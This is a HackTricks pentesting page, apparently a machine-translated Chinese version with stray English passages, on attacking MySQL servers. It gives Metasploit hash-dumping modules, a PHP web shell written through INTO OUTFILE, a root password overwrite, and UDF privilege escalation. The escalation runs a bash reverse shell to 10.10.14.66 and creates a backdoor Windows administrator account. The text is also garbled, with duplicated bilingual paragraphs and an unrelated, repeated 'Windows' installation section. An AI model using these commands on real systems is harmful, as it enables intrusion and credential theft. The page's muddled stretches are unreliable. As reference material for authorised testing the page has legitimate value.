hacktricks/network-services-pentesting/pentesting-mysql.md
2023-08-03 19:12:22 +00:00

878 lines
34 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 3306 - Pentesting Mysql
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一个**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks的衣物**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的网络安全活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士的热点交流平台。
{% embed url="https://www.rootedcon.com/" %}
## **基本信息**
**MySQL**是一个免费的开源关系型数据库管理系统RDBMS使用结构化查询语言**SQL**)。来自[这里](https://www.siteground.com/tutorials/php-mysql/mysql/)。
**默认端口:** 3306
```
3306/tcp open mysql
```
## **连接**
### **本地**
```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
```
### 远程
MySQL allows remote connections by default, which means that it can be accessed from other machines on the network. This can be a security risk if proper precautions are not taken.
MySQL默认允许远程连接这意味着它可以从网络上的其他计算机访问。如果不采取适当的预防措施这可能会带来安全风险。
To secure remote access to MySQL, you can follow these steps:
要保护MySQL的远程访问安全可以按照以下步骤进行操作
1. **Bind MySQL to a specific IP address**: By default, MySQL listens on all available IP addresses. You can change this by modifying the `bind-address` parameter in the MySQL configuration file (`my.cnf`). Set it to the IP address you want MySQL to listen on.
1. **将MySQL绑定到特定的IP地址**默认情况下MySQL监听所有可用的IP地址。您可以通过修改MySQL配置文件`my.cnf`)中的`bind-address`参数来更改此设置。将其设置为您希望MySQL监听的IP地址。
2. **Create a firewall rule**: Configure your firewall to only allow incoming connections to the MySQL port (default is 3306) from trusted IP addresses or networks. This will prevent unauthorized access to the MySQL service.
2. **创建防火墙规则**配置防火墙仅允许来自受信任的IP地址或网络的MySQL端口默认为3306的入站连接。这将防止未经授权的访问MySQL服务。
3. **Use strong passwords**: Ensure that all MySQL user accounts have strong, unique passwords. Avoid using default or easily guessable passwords.
3. **使用强密码**确保所有MySQL用户帐户都具有强大且唯一的密码。避免使用默认或容易猜测的密码。
4. **Limit privileges**: Grant only the necessary privileges to MySQL user accounts. Avoid granting unnecessary privileges that could be exploited by an attacker.
4. **限制权限**仅向MySQL用户帐户授予必要的权限。避免授予攻击者可能利用的不必要的权限。
5. **Enable SSL/TLS encryption**: Configure MySQL to use SSL/TLS encryption for secure communication between the client and the server. This will protect the data transmitted over the network from eavesdropping and tampering.
5. **启用SSL/TLS加密**配置MySQL使用SSL/TLS加密进行客户端和服务器之间的安全通信。这将保护通过网络传输的数据免受窃听和篡改。
By following these steps, you can enhance the security of your MySQL server and reduce the risk of unauthorized access or data breaches.
```bash
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
```
## 外部枚举
其中一些枚举操作需要有效的凭据
```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```
### [**暴力破解**](../generic-methodologies-and-resources/brute-force.md#mysql)
### 写入任何二进制数据
```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```
## **MySQL命令**
MySQL is a popular open-source relational database management system. It is widely used in web applications and is known for its speed and reliability. In this section, we will explore some commonly used MySQL commands for database management and manipulation.
### **Connecting to MySQL**
To connect to a MySQL server, you can use the following command:
```bash
mysql -h <host> -u <username> -p
```
Replace `<host>` with the hostname or IP address of the MySQL server, `<username>` with the username, and `<password>` with the password.
### **Creating a Database**
To create a new database, use the `CREATE DATABASE` command:
```sql
CREATE DATABASE <database_name>;
```
Replace `<database_name>` with the desired name for the database.
### **Selecting a Database**
To select a database to work with, use the `USE` command:
```sql
USE <database_name>;
```
Replace `<database_name>` with the name of the database you want to select.
### **Creating a Table**
To create a new table in a database, use the `CREATE TABLE` command:
```sql
CREATE TABLE <table_name> (
<column1_name> <column1_type>,
<column2_name> <column2_type>,
...
);
```
Replace `<table_name>` with the desired name for the table, `<column1_name>` with the name of the first column, `<column1_type>` with the data type of the first column, and so on.
### **Inserting Data**
To insert data into a table, use the `INSERT INTO` command:
```sql
INSERT INTO <table_name> (<column1_name>, <column2_name>, ...)
VALUES (<value1>, <value2>, ...);
```
Replace `<table_name>` with the name of the table, `<column1_name>` and `<column2_name>` with the names of the columns you want to insert data into, and `<value1>`, `<value2>`, etc. with the corresponding values.
### **Querying Data**
To retrieve data from a table, use the `SELECT` command:
```sql
SELECT <column1_name>, <column2_name>, ...
FROM <table_name>
WHERE <condition>;
```
Replace `<column1_name>`, `<column2_name>`, etc. with the names of the columns you want to retrieve, `<table_name>` with the name of the table, and `<condition>` with the condition that the data must meet.
### **Updating Data**
To update data in a table, use the `UPDATE` command:
```sql
UPDATE <table_name>
SET <column1_name> = <new_value1>, <column2_name> = <new_value2>, ...
WHERE <condition>;
```
Replace `<table_name>` with the name of the table, `<column1_name>`, `<column2_name>`, etc. with the names of the columns you want to update, `<new_value1>`, `<new_value2>`, etc. with the new values, and `<condition>` with the condition that the data must meet.
### **Deleting Data**
To delete data from a table, use the `DELETE FROM` command:
```sql
DELETE FROM <table_name>
WHERE <condition>;
```
Replace `<table_name>` with the name of the table and `<condition>` with the condition that the data must meet.
### **Dropping a Database**
To drop a database, use the `DROP DATABASE` command:
```sql
DROP DATABASE <database_name>;
```
Replace `<database_name>` with the name of the database you want to drop.
### **Dropping a Table**
To drop a table, use the `DROP TABLE` command:
```sql
DROP TABLE <table_name>;
```
Replace `<table_name>` with the name of the table you want to drop.
These are just a few of the many commands available in MySQL. By mastering these commands, you will have a solid foundation for managing and manipulating databases using MySQL.
```bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name
#Get a shell with the mysql client user
\! sh
#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
```
```bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```
### MySQL权限枚举
MySQL数据库是一种常用的关系型数据库管理系统用于存储和管理数据。在进行MySQL渗透测试时了解目标数据库的权限设置非常重要。通过枚举MySQL权限我们可以确定当前用户的权限级别并尝试利用可能存在的权限漏洞。
以下是一些常用的MySQL权限枚举技术
#### 1. SHOW GRANTS
使用`SHOW GRANTS`语句可以查看当前用户的权限。这将显示当前用户被授予的所有权限。
```sql
SHOW GRANTS;
```
#### 2. INFORMATION_SCHEMA
MySQL的`INFORMATION_SCHEMA`数据库存储了关于数据库、表、列和权限的元数据信息。我们可以查询`INFORMATION_SCHEMA`来获取有关权限的详细信息。
```sql
SELECT * FROM INFORMATION_SCHEMA.USER_PRIVILEGES;
```
#### 3. mysql.user表
`mysql.user`表包含了MySQL用户的详细信息包括用户名、密码和权限。我们可以查询该表来获取有关用户权限的信息。
```sql
SELECT * FROM mysql.user;
```
#### 4. SHOW GRANTS FOR
使用`SHOW GRANTS FOR`语句可以查看指定用户的权限。将`<username>`替换为要查询的用户名。
```sql
SHOW GRANTS FOR <username>;
```
#### 5. mysql.db表
`mysql.db`表存储了数据库级别的权限信息。我们可以查询该表来获取有关数据库权限的信息。
```sql
SELECT * FROM mysql.db;
```
#### 6. mysql.tables_priv表
`mysql.tables_priv`表存储了表级别的权限信息。我们可以查询该表来获取有关表权限的信息。
```sql
SELECT * FROM mysql.tables_priv;
```
#### 7. mysql.columns_priv表
`mysql.columns_priv`表存储了列级别的权限信息。我们可以查询该表来获取有关列权限的信息。
```sql
SELECT * FROM mysql.columns_priv;
```
通过使用这些MySQL权限枚举技术我们可以更好地了解目标数据库的权限设置并发现可能存在的安全漏洞。
```sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();
# Get users, permissions & hashes
SELECT * FROM mysql.user;
#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';
# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```
您可以在文档中查看每个权限的含义:[https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute)
### MySQL文件远程命令执行
{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %}
[mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
{% endcontent-ref %}
## MySQL客户端任意读取文件
实际上,当您尝试将**文件内容**通过**将数据加载到表中**的方式发送给MySQL或MariaDB服务器时服务器会要求**客户端读取文件并发送内容**。**因此如果您能够篡改MySQL客户端以连接到您自己的MySQL服务器您就可以读取任意文件。**\
请注意,这是使用以下方式的行为:
```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```
注意到“local”这个词\
因为没有“local”你可能会得到
```bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```
**初始 PoC**[**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**在这篇论文中,您可以看到对攻击的完整描述,甚至如何扩展到 RCE**[**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**在这里,您可以找到攻击的概述:**[**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士的热点聚会。
{% embed url="https://www.rootedcon.com/" %}
## POST
### Mysql 用户
如果 mysql 以 **root** 身份运行,那将非常有趣:
```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```
#### mysqld.cnf的危险设置
来自[https://academy.hackthebox.com/module/112/section/1238](https://academy.hackthebox.com/module/112/section/1238)
| **设置** | **描述** |
| ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------- |
| `user` | 设置MySQL服务将以哪个用户身份运行。 |
| `password` | 设置MySQL用户的密码。 |
| `admin_address` | 用于监听管理网络接口上的TCP/IP连接的IP地址。 |
| `debug` | 此变量指示当前的调试设置(日志中的敏感信息)。 |
| `sql_warnings` | 此变量控制单行INSERT语句在出现警告时是否生成信息字符串日志中的敏感信息。 |
| `secure_file_priv` | 此变量用于限制数据导入和导出操作的影响范围。 |
### 特权升级
```bash
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"
# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh
```
### 通过库进行权限提升
如果 **mysql 服务器以 root 用户**(或其他更高权限用户)运行,你可以让它执行命令。为此,你需要使用 **用户自定义函数**。而要创建用户自定义函数,你需要一个运行 mysql 的操作系统的 **库**
可以在 sqlmap 和 metasploit 中找到要使用的恶意库,方法是执行 **`locate "*lib_mysqludf_sys*"`** 命令。**`.so`** 文件是 **Linux** 库,**`.dll`** 是 **Windows** 库,选择你需要的那个。
如果你 **没有** 这些库,你可以 **寻找它们**,或者下载这个 [**Linux C 代码**](https://www.exploit-db.com/exploits/1518) 并在 Linux 受漏洞影响的机器上 **编译** 它:
```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
现在你已经有了库作为特权用户root登录到Mysql中然后按照以下步骤进行操作
#### Linux
```sql
# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```
#### Windows
#### Windows
MySQL can be installed on Windows using the official installer available on the MySQL website. Once installed, the MySQL service will be running in the background.
To connect to the MySQL server on Windows, you can use the MySQL Command Line Client or a graphical user interface (GUI) tool like MySQL Workbench.
To access the MySQL Command Line Client, open the Command Prompt and type `mysql -u <username> -p`. Replace `<username>` with the username you want to use to connect to the MySQL server. You will be prompted to enter the password for the specified username.
To use a GUI tool like MySQL Workbench, you will need to download and install it from the MySQL website. Once installed, open MySQL Workbench and click on the "+" icon in the "MySQL Connections" section to create a new connection. Enter the necessary details like the connection name, hostname, port, username, and password, and click "Test Connection" to verify the connection.
Once connected to the MySQL server, you can perform various tasks like creating databases, tables, and executing SQL queries.
#### Windows
MySQL可以使用MySQL官方网站上提供的官方安装程序在Windows上安装。安装完成后MySQL服务将在后台运行。
要连接到Windows上的MySQL服务器可以使用MySQL命令行客户端或图形用户界面GUI工具如MySQL Workbench。
要访问MySQL命令行客户端请打开命令提示符并键入`mysql -u <username> -p`。将`<username>`替换为要用于连接到MySQL服务器的用户名。然后您将被提示输入指定用户名的密码。
要使用MySQL Workbench等GUI工具您需要从MySQL网站下载并安装它。安装完成后打开MySQL Workbench单击“MySQL Connections”部分的“+”图标以创建新连接。输入必要的详细信息如连接名称、主机名、端口、用户名和密码然后单击“Test Connection”以验证连接。
连接到MySQL服务器后您可以执行各种任务如创建数据库、表和执行SQL查询。
```sql
# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```
### 从文件中提取MySQL凭据
_/etc/mysql/debian.cnf_ 文件中,您可以找到用户 **debian-sys-maint** 的**明文密码**。
```bash
cat /etc/mysql/debian.cnf
```
您可以使用这些凭据登录到MySQL数据库。
在文件_/var/lib/mysql/mysql/user.MYD_中您可以找到MySQL用户的所有哈希值可以从数据库中的mysql.user中提取的哈希值
您可以通过以下方式提取它们:
```bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
### 启用日志记录
您可以在`/etc/mysql/my.cnf`文件中取消注释以下行以启用mysql查询的日志记录
![](<../.gitbook/assets/image (277).png>)
### 有用的文件
配置文件
* windows \*
* config.ini
* my.ini
* windows\my.ini
* winnt\my.ini
* \<InstDir>/mysql/data/
* unix
* my.cnf
* /etc/my.cnf
* /etc/mysql/my.cnf
* /var/lib/mysql/my.cnf
* \~/.my.cnf
* /etc/my.cnf
* 命令历史记录
* \~/.mysql.history
* 日志文件
* connections.log
* update.log
* common.log
## 默认的MySQL数据库/表
{% tabs %}
{% tab title="information_schema" %}
ALL\_PLUGINS\
APPLICABLE\_ROLES\
CHARACTER\_SETS\
CHECK\_CONSTRAINTS\
COLLATIONS\
COLLATION\_CHARACTER\_SET\_APPLICABILITY\
COLUMNS\
COLUMN\_PRIVILEGES\
ENABLED\_ROLES\
ENGINES\
EVENTS\
FILES\
GLOBAL\_STATUS\
GLOBAL\_VARIABLES\
KEY\_COLUMN\_USAGE\
KEY\_CACHES\
OPTIMIZER\_TRACE\
PARAMETERS\
PARTITIONS\
PLUGINS\
PROCESSLIST\
PROFILING\
REFERENTIAL\_CONSTRAINTS\
ROUTINES\
SCHEMATA\
SCHEMA\_PRIVILEGES\
SESSION\_STATUS\
SESSION\_VARIABLES\
STATISTICS\
SYSTEM\_VARIABLES\
TABLES\
TABLESPACES\
TABLE\_CONSTRAINTS\
TABLE\_PRIVILEGES\
TRIGGERS\
USER\_PRIVILEGES\
VIEWS\
INNODB\_LOCKS\
INNODB\_TRX\
INNODB\_SYS\_DATAFILES\
INNODB\_FT\_CONFIG\
INNODB\_SYS\_VIRTUAL\
INNODB\_CMP\
INNODB\_FT\_BEING\_DELETED\
INNODB\_CMP\_RESET\
INNODB\_CMP\_PER\_INDEX\
INNODB\_CMPMEM\_RESET\
INNODB\_FT\_DELETED\
INNODB\_BUFFER\_PAGE\_LRU\
INNODB\_LOCK\_WAITS\
INNODB\_TEMP\_TABLE\_INFO\
INNODB\_SYS\_INDEXES\
INNODB\_SYS\_TABLES\
INNODB\_SYS\_FIELDS\
INNODB\_CMP\_PER\_INDEX\_RESET\
INNODB\_BUFFER\_PAGE\
INNODB\_FT\_DEFAULT\_STOPWORD\
INNODB\_FT\_INDEX\_TABLE\
INNODB\_FT\_INDEX\_CACHE\
INNODB\_SYS\_TABLESPACES\
INNODB\_METRICS\
INNODB\_SYS\_FOREIGN\_COLS\
INNODB\_CMPMEM\
INNODB\_BUFFER\_POOL\_STATS\
INNODB\_SYS\_COLUMNS\
INNODB\_SYS\_FOREIGN\
INNODB\_SYS\_TABLESTATS\
GEOMETRY\_COLUMNS\
SPATIAL\_REF\_SYS\
CLIENT\_STATISTICS\
INDEX\_STATISTICS\
USER\_STATISTICS\
INNODB\_MUTEXES\
TABLE\_STATISTICS\
INNODB\_TABLESPACES\_ENCRYPTION\
user\_variables\
INNODB\_TABLESPACES\_SCRUBBING\
INNODB\_SYS\_SEMAPHORE\_WAITS
{% endtab %}
{% tab title="mysql" %}
columns\_priv\
column\_stats\
db\
engine\_cost\
event\
func\
general\_log\
gtid\_executed\
gtid\_slave\_pos\
help\_category\
help\_keyword\
help\_relation\
help\_topic\
host\
index\_stats\
innodb\_index\_stats\
innodb\_table\_stats\
ndb\_binlog\_index\
plugin\
proc\
procs\_priv\
proxies\_priv\
roles\_mapping\
server\_cost\
servers\
slave\_master\_info\
slave\_relay\_log\_info\
slave\_worker\_info\
slow\_log\
tables\_priv\
table\_stats\
time\_zone\
time\_zone\_leap\_second\
time\_zone\_name\
time\_zone\_transition\
time\_zone\_transition\_type\
transaction\_registry\
user
{% endtab %}
{% tab title="performance_schema" %}
accounts\
cond\_instances\
events\_stages\_current\
events\_stages\_history\
events\_stages\_history\_long\
events\_stages\_summary\_by\_account\_by\_event\_name\
events\_stages\_summary\_by\_host\_by\_event\_name\
events\_stages\_summary\_by\_thread\_by\_event\_name\
events\_stages\_summary\_by\_user\_by\_event\_name\
events\_stages\_summary\_global\_by\_event\_name\
events\_statements\_current\
events\_statements\_history\
events\_statements\_history\_long\
events\_statements\_summary\_by\_account\_by\_event\_name\
events\_statements\_summary\_by\_digest\
events\_statements\_summary\_by\_host\_by\_event\_name\
events\_statements\_summary\_by\_program\
events\_statements\_summary\_by\_thread\_by\_event\_name\
events\_statements\_summary\_by\_user\_by\_event\_name\
events\_statements\_summary\_global\_by\_event\_name\
events\_transactions\_current\
events\_transactions\_history\
events\_transactions\_history\_long\
events\_transactions\_summary\_by\_account\_by\_event\_name\
events\_transactions\_summary\_by\_host\_by\_event\_name\
events\_transactions\_summary\_by\_thread\_by\_event\_name\
events\_transactions\_summary\_by\_user\_by\_event\_name\
events\_transactions\_summary\_global\_by\_event\_name\
events\_waits\_current\
events\_waits\_history\
events\_waits\_history\_long\
events\_waits\_summary\_by\_account\_by\_event\_name\
events\_waits\_summary\_by\_host\_by\_event\_name\
events\_waits\_summary\_by\_instance\
events\_waits\_summary\_by\_thread\_by\_event\_name\
events\_waits\_summary\_by\_user\_by\_event\_name\
events\_waits\_summary\_global\_by\_event\_name\
file\_instances\
file\_summary\_by\_event\_name\
file\_summary\_by\_instance\
global\_status\
global\_variables\
host\_cache\
hosts\
memory\_summary\_by\_account\_by\_event\_name\
memory\_summary\_by\_host\_by\_event\_name\
memory\_summary\_by\_thread\_by\_event\_name\
memory\_summary\_by\_user\_by\_event\_name\
memory\_summary\_global\_by\_event\_name\
metadata\_locks\
mutex\_instances\
objects\_summary\_global\_by\_type\
performance\_timers\
prepared\_statements\_instances\
replication\_applier\_configuration\
replication\_applier\_status\
replication\_applier\_status\_by\_coordinator\
replication\_applier\_status\_by\_worker\
replication\_connection\_configuration\
replication\_connection\_status\
replication\_group\_member\_stats\
replication\_group\_members\
rwlock\_instances\
session\_account\_connect\_attrs\
session\_connect\_attrs\
session\_status\
session\_variables\
setup\_actors\
setup\_consumers\
setup\_instruments\
setup\_objects\
setup\_timers\
socket\_instances\
socket\_summary\_by\_event\_name\
socket\_summary\_by\_instance\
status\_by\_account\
status\_by\_host\
status\_by\_thread\
status\_by\_user\
table\_handles\
table\_io\_waits\_summary\_by\_index\_usage\
table\_io\_waits\_summary\_by\_table\
table\_lock\_waits\_summary\_by\_table\
threads\
user\_variables\_by\_thread\
users\
variables\_by\_thread
{% endtab %}
{% tab title="sys" %}
host\_summary\
host_summary_by_file_io\
host_summary_by_file_io_type\
host_summary_by_stages\
host_summary_by_statement_latency\
host_summary_by_statement_type\
innodb_buffer_stats_by_schema\
innodb_buffer_stats_by_table\
innodb_lock_waits\
io_by_thread_by_latency\
io_global_by_file_by_bytes\
io_global_by_file_by_latency\
io_global_by_wait_by_bytes\
io_global_by_wait_by_latency\
latest_file_io\
memory_by_host_by_current_bytes\
memory_by_thread_by_current_bytes\
memory_by_user_by_current_bytes\
memory_global_by_current_bytes\
memory_global_total\
metrics\
processlist\
ps_check_lost_instrumentation\
schema_auto_increment_columns\
schema_index_statistics\
schema_object_overview\
schema_redundant_indexes\
schema_table_lock_waits\
schema_table_statistics\
schema_table_statistics_with_buffer\
schema_tables_with_full_table_scans\
schema_unused_indexes\
session\
session_ssl_status\
statement_analysis\
statements_with_errors_or_warnings\
statements_with_full_table_scans\
statements_with_runtimes_in_95th_percentile\
statements_with_sorting\
statements_with_temp_tables\
sys_config\
user_summary\
user_summary_by_file_io\
user_summary_by_file_io_type\
user_summary_by_stages\
user_summary_by_statement_latency\
user_summary_by_statement_type\
version\
wait_classes_global_by_avg_latency\
wait_classes_global_by_latency\
waits_by_host_by_latency\
waits_by_user_by_latency\
waits_global_by_latency\
x$host_summary\
x$host_summary_by_file_io\
x$host_summary_by_file_io_type\
x$host_summary_by_stages\
x$host_summary_by_statement_latency\
x$host_summary_by_statement_type\
x$innodb_buffer_stats_by_schema\
x$innodb_buffer_stats_by_table\
x$innodb_lock_waits\
x$io_by_thread_by_latency\
x$io_global_by_file_by_bytes\
x$io_global_by_file_by_latency\
x$io_global_by_wait_by_bytes\
x$io_global_by_wait_by_latency\
x$latest_file_io\
x$memory_by_host_by_current_bytes\
x$memory_by_thread_by_current_bytes\
x$memory_by_user_by_current_bytes\
x$memory_global_by_current_bytes\
x$memory_global_total\
x$processlist\
x$ps_digest_95th_percentile_by_avg_us\
x$ps_digest_avg_latency_distribution\
x$ps_schema_table_statistics_io\
x$schema_flattened_keys\
x$schema_index_statistics\
x$schema_table_lock_waits\
x$schema_table_statistics\
x$schema_table_statistics_with_buffer\
x$schema_tables_with_full_table_scans\
x$session\
x$statement_analysis\
x$statements_with_errors_or_warnings\
x$statements_with_full_table_scans\
x$statements_with_runtimes_in_95th_percentile\
x$statements_with_sorting\
x$statements_with_temp_tables\
x$user_summary\
x$user_summary_by_file_io\
x$user_summary_by_file_io_type\
x$user_summary_by_stages\
x$user_summary_by_statement_latency\
x$user_summary_by_statement_type\
x$wait_classes_global_by_avg_latency\
x$wait_classes_global_by_latency\
x$waits_by_host_by_latency\
x$waits_by_user_by_latency\
x$waits_global_by_latency
## HackTricks自动命令
```
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士的热点交流平台。
{% embed url="https://www.rootedcon.com/" %}
<details>
